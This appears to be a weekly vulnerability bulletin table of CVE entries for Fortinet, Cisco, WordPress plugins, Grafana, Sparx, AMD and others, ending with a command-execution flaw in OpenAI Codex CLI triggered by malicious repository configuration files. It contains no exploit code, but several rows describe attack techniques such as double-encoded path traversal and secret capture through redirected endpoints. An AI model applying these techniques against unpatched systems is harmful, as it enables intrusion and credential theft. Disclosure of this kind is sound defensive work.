| Fortinet--FortiVoice | An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least read-only permission on system maintenance to access backup information via crafted HTTP requests. | 2026-04-14 | 5.4 | CVE-2024-23104 | https://fortiguard.fortinet.com/psirt/FG-IR-26-124 |
| WSO2--WSO2 API Manager | The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. This deficiency allows a malicious actor to inject script content that is executed within the context of a user's browser. By leveraging this cross-site scripting vulnerability, a malicious actor can cause the browser to redirect to a malicious website, make changes to the UI of the web page, or retrieve information from the browser. However, session hijacking is not possible as all session-related sensitive cookies are protected by the httpOnly flag. | 2026-04-16 | 5.4 | CVE-2024-4867 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3391/ |
| cartasi--Nexi XPay | The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed. | 2026-04-14 | 5.3 | CVE-2025-15565 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268 |
| Dell--Dell Pro 14 Essential PV14250 | Dell Client Platform BIOS contains a Weak Password Recovery Mechanism vulnerability. An unauthenticated attacker with physical access to the system could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-16 | 5.1 | CVE-2025-36579 | https://www.dell.com/support/kbdoc/en-us/000300450/dsa-2025-153 |
| Fortinet--FortiOS | An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands. | 2026-04-14 | 5.4 | CVE-2025-61624 | https://fortiguard.fortinet.com/psirt/FG-IR-26-122 |
| Fortinet--FortiManager Cloud | An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests. | 2026-04-14 | 5.4 | CVE-2025-68649 | https://fortiguard.fortinet.com/psirt/FG-IR-26-120 |
| wpxpo--Post Grid Gutenberg Blocks for News, Magazines, Blog Websites PostX | The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites - PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ultp_shareCount_callback() function in all versions up to, and including, 5.0.5. This makes it possible for unauthenticated attackers to modify the share_count post meta for any post, including private or draft posts. | 2026-04-16 | 5.3 | CVE-2026-0718 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c4b2cf3b-5d35-4ce6-9453-1538a6f7752f?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/ultimate-post/tags/5.0.5/classes/Blocks.php&new_path=/ultimate-post/tags/5.0.6/classes/Blocks.php |
| iberezansky--3D FlipBook PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery | The 3D FlipBook - PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the send_post_pages_json() function in all versions up to, and including, 1.16.17. This makes it possible for unauthenticated attackers to retrieve flipbook page metadata for draft, private and password-protected flipbooks. | 2026-04-14 | 5.3 | CVE-2026-1314 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7e41753-2dbf-4afa-b61e-e617be2c4dc2?source=cve https://plugins.trac.wordpress.org/changeset/3467608/ |
| themefusion--Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Arbitrary WordPress Action Execution in all versions up to, and including, 3.15.1. This is due to the plugin's `output_action_hook()` function accepting user-controlled input to trigger any registered WordPress action hook without proper authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary WordPress action hooks via the Dynamic Data feature, potentially leading to privilege escalation, file inclusion, denial of service, or other security impacts depending on which action hooks are available in the WordPress installation. | 2026-04-15 | 5.4 | CVE-2026-1509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc57b06-bae9-49a3-84dd-f593705330e9?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 https://avada.com/documentation/avada-changelog/ |
| Wpmet--MetForm Pro | The MetForm Pro plugin for WordPress is vulnerable to Improper Input Validation in all versions up to, and including, 3.9.7. This is due to the payment integrations (Stripe/PayPal) trusting a user-submitted calculation field value without recomputing or validating it against the configured form price. This makes it possible for unauthenticated attackers to manipulate the payment amount via the 'mf-calculation' field in the form submission REST request granted there exists a specific form with this particular configuration. | 2026-04-15 | 5.3 | CVE-2026-1782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a49dd64b-6ae8-49ed-9e8a-e5b73c2acf4b?source=cve https://wpmet.com/plugin/metform/ |
| Cisco--Cisco Secure Web Appliance | A vulnerability in the authentication service feature of Cisco AsyncOS Software for Cisco Secure Web Appliance could allow an unauthenticated, remote attacker to bypass authentication policy requirements. This vulnerability is due to improper validation of user-supplied authentication input in HTTP requests. An attacker could exploit this vulnerability by sending HTTP requests that contain specific authentication requests to an affected device. A successful exploit could allow the attacker to bypass policy enforcement on the device. There is no direct impact to the Cisco Secure Web Appliance. However, as a result of exploiting this vulnerability, an attacker could send HTTP requests that should be restricted through the device. | 2026-04-15 | 5.3 | CVE-2026-20152 | cisco-sa-wsa-auth-bypass-6YZkTQhd |
| Cisco--Cisco ThousandEyes Enterprise Agent | A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent could allow an authenticated, local attacker with low privileges to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are on the local file system of an affected device. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system. A successful exploit could allow the attacker to bypass file system permissions and overwrite arbitrary files on the affected device. | 2026-04-15 | 5.5 | CVE-2026-20161 | cisco-sa-te-agentfilewrite-tqUw3SMU |
| Microsoft--Windows 10 Version 1809 | Access of resource using incompatible type ('type confusion') in Windows COM allows an authorized attacker to disclose information locally. | 2026-04-14 | 5.5 | CVE-2026-20806 | Windows COM Server Information Disclosure Vulnerability |
| Grafana--Loki | The CVE-2021-36156 fix validates the namespace parameter for path traversal sequences after a single URL decode; by double encoding, an attacker can read files at the Ruler API endpoint /loki/api/v1/rules/{namespace}. Thanks to Prasanth Sundararajan for reporting this vulnerability. | 2026-04-15 | 5.3 | CVE-2026-21726 | https://grafana.com/security/security-advisories/cve-2026-21726 |
| Fortinet--FortiSOAR PaaS | A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to view cleartext password in response for Secure Message Exchange and Radius queries, if configured. | 2026-04-14 | 5.4 | CVE-2026-21742 | https://fortiguard.fortinet.com/psirt/FG-IR-26-106 |
| Eaton--IPP Software | Eaton Intelligent Power Protector (IPP) uses an insecure cookie configuration, which could allow a network-based attacker to intercept the cookie and exploit it through a man-in-the-middle attack. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download centre. | 2026-04-16 | 5.7 | CVE-2026-22617 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| Eaton--IPP software | A security misconfiguration was identified in Eaton Intelligent Power Protector (IPP), where an HTTP response header was set with an insecure attribute, potentially exposing users to web-based attacks. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download centre. | 2026-04-16 | 5.9 | CVE-2026-22618 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| Wago--Smart Designer | In Wago Smart Designer in versions up to 2.33.1 a low privileged remote attacker may enumerate projects and usernames through iterative requests to a specific endpoint. | 2026-04-16 | 4.3 | CVE-2023-5872 | https://certvde.com/de/advisories/VDE-2023-045 https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2023/vde-2023-045.json |
| Vision--Helpdesk | Vision Helpdesk before 5.7.0 (patched in 5.6.10) allows attackers to read user profiles via modified serialized cookie data to vis_client_id. | 2026-04-16 | 4.3 | CVE-2024-58343 | https://github.com/websec/Vision-Helpdesk-Exploit https://websec.net/blog/critical-vulnerability-in-vision-helpdesk-allows-unauthorized-session-access-67264646bde7fa99ea26446f |
| Zaytech--Smart Online Order for Clover | Cross-Site Request Forgery (CSRF) vulnerability in Zaytech Smart Online Order for Clover allows Cross Site Request Forgery. This issue affects Smart Online Order for Clover: from n/a through 1.6.0. | 2026-04-15 | 4.3 | CVE-2025-15635 | https://patchstack.com/database/wordpress/plugin/clover-online-orders/vulnerability/wordpress-smart-online-order-for-clover-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.12.0.0, contains an improper check for unusual or exceptional conditions vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service. | 2026-04-16 | 4.1 | CVE-2025-43883 | https://www.dell.com/support/kbdoc/en-us/000376214/dsa-2025-347-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.12.0.0, contains an improper resource shutdown or release vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service. | 2026-04-16 | 4.4 | CVE-2025-43935 | https://www.dell.com/support/kbdoc/en-us/000376214/dsa-2025-347-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| DeluxeThemes--Userpro | Cross-Site Request Forgery (CSRF) vulnerability in DeluxeThemes Userpro allows Cross Site Request Forgery. This issue affects Userpro: from n/a before 5.1.11. | 2026-04-15 | 4.3 | CVE-2025-53444 | https://patchstack.com/database/wordpress/plugin/userpro/vulnerability/wordpress-userpro-plugin-5-1-11-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Fortinet--FortiSOAR on-premise | A server-side request forgery (SSRF) vulnerability [CWE-918] in Fortinet FortiSOAR PaaS 7.6.4, FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.4, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to discover services running on local ports via crafted requests. | 2026-04-14 | 4.1 | CVE-2025-59809 | https://fortiguard.fortinet.com/psirt/FG-IR-26-103 |
| Fortinet--FortiSandbox PaaS | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests. | 2026-04-14 | 4.9 | CVE-2025-61886 | https://fortiguard.fortinet.com/psirt/FG-IR-26-109 |
| themefusion--Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.15.1. This is due to the plugin's `fusion_get_post_custom_field()` function failing to validate whether metadata keys are protected (underscore-prefixed). This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract protected post metadata fields that should not be publicly accessible via the Dynamic Data feature's `post_custom_field` parameter. | 2026-04-15 | 4.3 | CVE-2026-1541 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f1f69f93-80e3-434d-98a6-fc8757b4e6d1?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. This vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious web page. | 2026-04-15 | 4.7 | CVE-2026-20060 | cisco-sa-unity-vulns-n2EJSbbw |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to perform an SQL injection attack against an affected device. To exploit this vulnerability, the attacker must have valid user credentials on the affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP(S) request to the web-based management interface of an affected device. A successful exploit could allow the attacker to view data on the affected device. | 2026-04-15 | 4.3 | CVE-2026-20061 | cisco-sa-unity-vulns-n2EJSbbw |
| Cisco--Cisco Identity Services Engine Software | Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative write privileges to conduct a stored cross-site scripting (XSS) attack or a reflected XSS attack against a user of the web-based management interface of an affected device. These vulnerabilities are due to insufficient sanitization of user-supplied data that is stored in the web page. An attacker could exploit these vulnerabilities by convincing a user of the interface to click a specific link or view an affected web page. The injected script code may be executed in the context of the web-based management interface or allow the attacker to access sensitive browser-based information. | 2026-04-15 | 4.8 | CVE-2026-20132 | cisco-sa-isexss-BS8ctE7U |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected system. A successful exploit could allow the attacker to access sensitive files on the affected system. | 2026-04-15 | 4.9 | CVE-2026-20148 | cisco-sa-ise-rce-traversal-8bYndVrZ |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.10, and 9.3.11, and Splunk Cloud Platform versions below 10.4.2603.0, 10.3.2512.6, 10.2.2510.10, 10.1.2507.19, 10.0.2503.13, and 9.3.2411.127, a low-privileged user that does not hold the `admin` or `power` Splunk roles, has write permission on the app, and does not hold the high-privilege capability `accelerate_datamodel`, could turn on or off Data Model Acceleration due to improper access control. | 2026-04-15 | 4.3 | CVE-2026-20203 | https://advisory.splunk.com/advisories/SVD-2026-0402 |
| Microsoft--Windows 10 Version 1607 | Improper removal of sensitive information before storage or transfer in Windows Recovery Environment Agent allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-04-14 | 4.6 | CVE-2026-20928 | Windows Recovery Environment Security Feature Bypass Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-04-14 | 4.6 | CVE-2026-20945 | Microsoft SharePoint Server Spoofing Vulnerability |
| Fortinet--FortiSOAR PaaS | An improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP Requests. | 2026-04-14 | 4.4 | CVE-2026-22154 | https://fortiguard.fortinet.com/psirt/FG-IR-26-117 |
| Fortinet--FortiSOAR PaaS | A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve Service account password via server address modification in LDAP configuration. | 2026-04-14 | 4.1 | CVE-2026-22574 | https://fortiguard.fortinet.com/psirt/FG-IR-26-105 |
| Fortinet--FortiSOAR PaaS | A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve passwords for multiple installed connectors via server address modification in connector configuration. | 2026-04-14 | 4.1 | CVE-2026-22576 | https://fortiguard.fortinet.com/psirt/FG-IR-26-104 |
| octobercms--october | October is a Content Management System (CMS) and web platform. Versions prior to 3.7.13 and versions 4.0.0 through 4.1.4 contain a sandbox bypass vulnerability in the optional Twig safe mode feature (CMS_SAFE_MODE). Certain methods on the collect() helper were not properly restricted, allowing authenticated users with template editing permissions to bypass sandbox protections. Exploitation requires authenticated backend access with CMS template editing permissions and only affects installations with CMS_SAFE_MODE enabled (disabled by default). This issue has been fixed in versions 3.7.13 and 4.1.5. To work around this issue, users can disable CMS_SAFE_MODE if untrusted template editing is not required, and restrict CMS template editing permissions to fully trusted administrators only. | 2026-04-14 | 4.9 | CVE-2026-22692 | https://github.com/octobercms/october/security/advisories/GHSA-m5qg-jc75-4jp6 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| WSO2--WSO2 API Manager | The component accepts XML input through the publisher without disabling external entity resolution. This allows malicious actors to submit a crafted XML payload that exploits the unescaped external entity references. By leveraging this vulnerability, a malicious actor can read confidential files from the product's file system or access limited HTTP resources reachable via HTTP GET requests to the vulnerable product. | 2026-04-16 | 3.5 | CVE-2024-8010 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3581/ |
| 1Panel-dev--MaxKB | A vulnerability has been found in 1Panel-dev MaxKB up to 2.4.2. Impacted is an unknown function of the file ui/src/chat.ts of the component MdPreview. Such manipulation leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.5.0 is recommended to address this issue. The name of the patch is 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-04-13 | 3.5 | CVE-2025-15632 | VDB-356967 (1Panel-dev MaxKB MdPreview chat.ts cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #782265 (1Panel-dev MaxKB <= v2.6.1 Stored XSS); https://github.com/AnalogyC0de/public_exp/issues/28 https://github.com/1Panel-dev/MaxKB/pull/4578 https://github.com/1Panel-dev/MaxKB/commit/7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8 https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0 https://github.com/1Panel-dev/MaxKB/ |
| Siemens--Siemens Software Center | A vulnerability has been identified in Siemens Software Center (All versions < V3.5.8.2), Simcenter 3D (All versions < V2506.6000), Simcenter Femap (All versions < V2506.0002), Simcenter STAR-CCM+ (All versions < V2602), Solid Edge SE2025 (All versions < V225.0 Update 13), Solid Edge SE2026 (All versions < V226.0 Update 04), Tecnomatix Plant Simulation (All versions < V2504.0008). Affected applications do not properly validate client certificates to connect to Analytics Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks. | 2026-04-14 | 3.7 | CVE-2025-40745 | https://cert-portal.siemens.com/productcert/html/ssa-981622.html |
| Grafana--Grafana Correlations | Cross-Tenant Legacy Correlation Disclosure and Deletion (Grafana advisory dated 2026-01-29; severity Low; CVSS vector CVSS:3.3/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N; fixed versions >=11.6.11, >=12.0.9, >=12.1.6, >=12.2.4). A cross-tenant isolation vulnerability was found in Grafana's Correlations feature affecting legacy correlation records. Due to a backward compatibility condition allowing org_id = 0 records to be returned across organizations, a user with datasource management privileges could read and permanently delete legacy correlation data belonging to another organization. This issue affects correlations created prior to Grafana 10.2 and is fixed in >=11.6.11, >=12.0.9, >=12.1.6, and >=12.2.4. Thanks to Gyu-hyeok Lee (g2h) for reporting this vulnerability. | 2026-04-15 | 3.3 | CVE-2026-21727 | https://grafana.com/security/security-advisories/cve-2026-21727 |
| HCL--AION | HCL AION is affected by a vulnerability where certain system behaviours may allow exploration of internal filesystem structures. Exposure of such information may provide insights into the underlying environment, which could potentially aid in further targeted actions or limited information disclosure. | 2026-04-15 | 2.9 | CVE-2025-52641 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130007 |
| Fortinet--FortiNAC-F | A URL Redirection to Untrusted Site ('Open Redirect') vulnerability [CWE-601] in Fortinet FortiNAC-F 7.6.0 through 7.6.5, FortiNAC-F 7.4 all versions, FortiNAC-F 7.2 all versions may allow a remote privileged attacker with system administrator role to redirect users to an arbitrary website via a crafted CSV file. | 2026-04-14 | 2.2 | CVE-2026-21741 | https://fortiguard.fortinet.com/psirt/FG-IR-26-118 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AMD--AMD EPYC 7003 Series Processors | Insufficient checks of the RMP on host buffer access in IOMMU may allow an attacker with privileges and a compromised hypervisor to trigger an out of bounds condition without RMP checks, resulting in a potential loss of confidential guest integrity. | 2026-04-16 | not yet calculated | CVE-2023-20585 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3016.html |
| n/a--NietThijmen ShoppingCart 0.0.2 | Command injection in the connect function in NietThijmen ShoppingCart 0.0.2 allows an attacker to execute arbitrary shell commands and achieve remote code execution via injection of malicious payloads into the Port field. | 2026-04-15 | not yet calculated | CVE-2024-53412 | https://github.com/NietThijmen/ShoppingCart/issues/1 https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md |
| Grafana--Grafana Alerting | In Grafana's alerting system, users with edit permissions for a contact point (specifically the permissions "alert.notifications:write" or "alert.notifications.receivers:test", which are granted as part of the fixed role "Contact Point Writer", itself part of the basic role Editor) can edit contact points created by other users and modify the endpoint URL to point at a server they control. By invoking the test functionality, attackers can capture and extract redacted secure settings, such as authentication credentials for third-party services (e.g., Slack tokens). This leads to unauthorized access and potential compromise of external integrations. | 2026-04-15 | not yet calculated | CVE-2025-12141 | https://grafana.com/security/security-advisories/cve-2025-12141/ |
| MCPHub--MCPHub | MCPHub in versions below 0.11.0 is vulnerable to authentication bypass. Some endpoints are not protected by authentication middleware, allowing an unauthenticated attacker to perform actions in the name of other users and using their privileges. | 2026-04-14 | not yet calculated | CVE-2025-13822 | https://github.com/samanhappy/mcphub https://cert.pl/en/posts/2026/04/CVE-2025-13822 |
| Legion of the Bouncy Castle Inc.--BC-JAVA | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (core modules). This vulnerability is associated with program files G3413CTRBlockCipher. The GOSTCTR implementation is unable to process more than 255 blocks correctly. This issue affects BC-JAVA: from 1.59 before 1.84. | 2026-04-15 | not yet calculated | CVE-2025-14813 | https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902025%E2%80%9014813 https://github.com/bcgit/bc-java/commit/b42574345414e4b7c8051b16fa1fafe01c29871f https://github.com/bcgit/bc-java/commit/701686cb0184cd9ae103c801b3581fdf95c6d4f3 |
| Unknown--Form Maker by 10Web | The Form Maker by 10Web WordPress plugin before 1.15.38 does not properly prepare SQL queries when the "MySQL Mapping" feature is in use, which could make SQL Injection attacks possible in certain contexts. | 2026-04-13 | not yet calculated | CVE-2025-15441 | https://wpscan.com/vulnerability/41f69b0a-4d17-4a6b-b803-ea1c370e3cc0/ |
| OpenText, Inc--RightFax | Deserialization of untrusted data vulnerability in OpenText, Inc RightFax on Windows, 64 bit, 32 bit allows Object Injection. This issue affects RightFax: through 25.4. | 2026-04-15 | not yet calculated | CVE-2025-15610 | https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0861863 |
| Sparx Systems Pty Ltd.--Sparx Enterprise Architect | Insufficiently Protected Credentials in Sparx Systems Pty Ltd. Sparx Enterprise Architect. The client does not verify the receiver of OAuth2 credentials during OpenID authentication. | 2026-04-16 | not yet calculated | CVE-2025-15621 | https://sparxsystems.com/products/ea/17.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Enterprise Architect | Insufficiently Protected Credentials vulnerability in Sparx Systems Pty Ltd. Sparx Enterprise Architect. The client reveals the plaintext OAuth2 client secret: the desktop client decodes the secret and uses the plaintext secret to exchange it for access and ID tokens as part of the OpenID authentication flow. | 2026-04-17 | not yet calculated | CVE-2025-15622 | https://sparxsystems.com/products/ea/17.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Pro Cloud Server | Exposure of Private Personal Information to an Unauthorized Actor and Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Sparx Systems Pty Ltd. Sparx Pro Cloud Server. An unauthenticated user can retrieve the database password in plaintext in certain situations. | 2026-04-17 | not yet calculated | CVE-2025-15623 | https://sparxsystems.com/products/procloudserver/6.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Pro Cloud Server | Plaintext Storage of a Password vulnerability in Sparx Systems Pty Ltd. Sparx Pro Cloud Server. In a setup where OpenID is used as the primary method of authentication to authenticate to Sparx EA, Pro Cloud Server creates local passwords to the users and stores them in plaintext. | 2026-04-17 | not yet calculated | CVE-2025-15624 | https://sparxsystems.com/products/procloudserver/6.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Pro Cloud Server | Unauthenticated user is able to execute arbitrary SQL commands in Sparx Pro Cloud Server database in certain cases. | 2026-04-17 | not yet calculated | CVE-2025-15625 | https://sparxsystems.com/products/procloudserver/6.1/history.html |
| n/a--Phpgurukul Online Course | In Phpgurukul Online Course Registration v3.1, an arbitrary file upload vulnerability was discovered within the profile picture upload functionality on the /my-profile.php page. | 2026-04-13 | not yet calculated | CVE-2025-51414 | https://github.com/12T40910/CVE/issues/12 https://medium.com/@tanushkushtk01/cve-2025-51414-unrestricted-file-upload-in-online-course-registration-v3-1-bd8b839be1d7 |
| AMD--AMD EPYC 9004 Series Processors | Incorrect use of boot service in the AMD Platform Configuration Blob (APCB) SMM driver could allow a privileged attacker with local access (Ring 0) to achieve privilege escalation potentially resulting in arbitrary code execution. | 2026-04-16 | not yet calculated | CVE-2025-54502 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-7054.html |
| AMD--AMD EPYC 9004 Series Processors | A missing lock verification in AMD Secure Processor (ASP) firmware may permit a locally authenticated attacker with administrative privileges to alter MMIO routing on some Zen 5-based products, potentially compromising guest system integrity. | 2026-04-16 | not yet calculated | CVE-2025-54510 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3034.html |
| Apache Software Foundation--Apache Airflow | The example example_xcom that was included in Airflow documentation implemented an unsafe pattern of reading a value from XCom in a way that could be exploited to allow a UI user who had access to modify XComs to perform arbitrary code execution on the worker. Since UI users are already highly trusted, this is a Low severity vulnerability. It does not affect Airflow releases, as example DAGs are not supposed to be enabled in production environments; however, users following the example could replicate the bad pattern. The documentation of Airflow 3.2.0 contains a version of the example with improved resilience for that case. Users who followed that pattern are advised to adjust their implementations accordingly. | 2026-04-15 | not yet calculated | CVE-2025-54550 | https://lists.apache.org/thread/3mf4cfx070ofsnf9qy0s2v5gqb5sc2g1 https://github.com/apache/airflow/pull/63200 |
| Openai[.]com-- Codex CLI v0.23.0 | A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers to embed arbitrary commands that execute immediately. | 2026-04-14 | not yet calculated | CVE-2025-61260 | http://openai.com https://research.checkpoint.com/2025/openai-codex-cli-command-injection-vulnerability/ |
